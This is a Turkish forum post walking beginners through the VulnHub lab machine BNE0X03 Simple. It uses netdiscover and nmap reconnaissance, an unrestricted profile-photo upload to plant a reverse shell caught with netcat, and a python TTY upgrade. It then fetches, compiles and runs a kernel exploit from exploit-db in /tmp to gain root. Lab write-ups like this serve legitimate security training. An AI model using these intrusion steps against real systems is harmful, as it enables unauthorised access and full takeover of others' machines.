BNE0X03 -Simple Zafiyetli Makine Çözümü

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18
Can tarafından yazılmıştır.

[TR] BNE0X03 -Simple Zafiyetli Makine Çözümü​




Selamlar herkese, yeni başlayan dostlarımız için bir makine buldum. Bunun çözümünü sizinle paylaşmak istedim. Yeni başlayan dostlarımız için kolaydan zora makine çözümleri yapmayı planlıyorum. Dilerseniz makineyi VulnHub üzerinden yükleyip çözebilirsiniz.

İzleyeceğimiz adımlar;
Sistemi Tanıma,
Zaafiyeti bulma,
Sömürme ve yetki yükseltme olacaktır.

İlk adımımız Sistemi Tanıma
Sistemi Tanıma adımlarında şu adımları izleyebiliriz;
Ağ keşifi,port taraması, dizin keşfi.

Ağ keşifi yaparken Netdiscover aracını kullanıyoruz.

sudo netdiscover yazarak aracı kullanabiliriz.

2.png

Netdiscover

Yukarıda görüldüğü üzere makineye ait ip adresi yer alıyor. (Eğer ki sizde görünmüyorsa,ağ ayarlarını kontrol edin.)

Netdiscover aracından bulduğumuz IP adresini “nmap” isimli port tarama aracında kullanacağız.

3-300x48.png

Nmap Taraması

nmap -sS -sV ip_adresi yazarak nmap’i kullanıyoruz.

80 Portu açık. Yani bir web servisi ayakta.siteyi ziyaret ettiğimizde
4-300x164.png


login ve register olduğunu görüyoruz .Hesap açıp panele giriş yaptığımızda ise:

6-1-300x163.png

Kullanıcı paneli

şekilde bir görüntü ile karşlaşıyoruz.

2.adım: Sömürme



Paneldeki fonksiyonlar basit. O sebepten çok fazla atak vektörü yok. Kullanıcıların profil fotoğrafı yükleyebildiği bir yer var.Bu fonksiyonda “Unrestricted File Upload” zaafiyeti var. Yani fotoğraf yüklememiz gerekiyorken biz oraya reverse shell yükleyeceğiz.

7.png

Reverse Shell

Kullandığımız reverse shelle buradan erişebilirsiniz. Evet şu anda reverse shellimiz başarıyla siteye yüklendi. Şimdi ise terminale gidip nc -lvp reverse_shelle_eklediğiniz_port_numarası yazmamız gerekmektedir. Bu sayede artık saldırgan portu dinlemeye almış olacak. Sağ tık “resmi yeni sayfada aç” diyerek yeni sekmede shellimizi açıyoruz.

9.png

Reverse Shell’e bağlanma

şimdi ise python -c ‘import pty; pty.spawn(“/bin/bash”)’ yazarak TTY shell’imize geçiyoruz

10.png

TTY shell

3. adım: Yetki Yükseltme

11-300x26.png

sürüm bilgisi

uname -a yazarak sistemin versiyon bilgilerine eriştik. Google’da bu sürümün (Privilege Escalation) yetki yükseltme exploitini arıyoruz.(buradan bulabilirsiniz)

12-300x69.png

exploit yükleme & derleme

Daha sonra ise tmp dizinine geçiyoruz.wget “https://www.exploit-db.com/exploits/37292” komutu ile exploitimizi yüklüyoruz. Yüklenen dosya ismini mv 37292 37292.c olarak değiştiriyoruz, ardından gcc ile kodumuzu derliyoruz.
gcc 37292.c 37292 yazarak kodumuzun derlenmiş halini 37292 olarak kaydediyoruz.şimdi ise ./37292 yazdığımız zaman root yetkilerine erişmiş olacağız.

13.png

root

Elimden geldiğince net anlatmaya çalıştım. Umarım anlaşılır olabilmişimdir. Herhangi bir sorunuz olursa twitter.com/pwnlabme adresinden ulaşabilirsiniz.
 
Moderatör tarafında düzenlendi:
Geri
Üst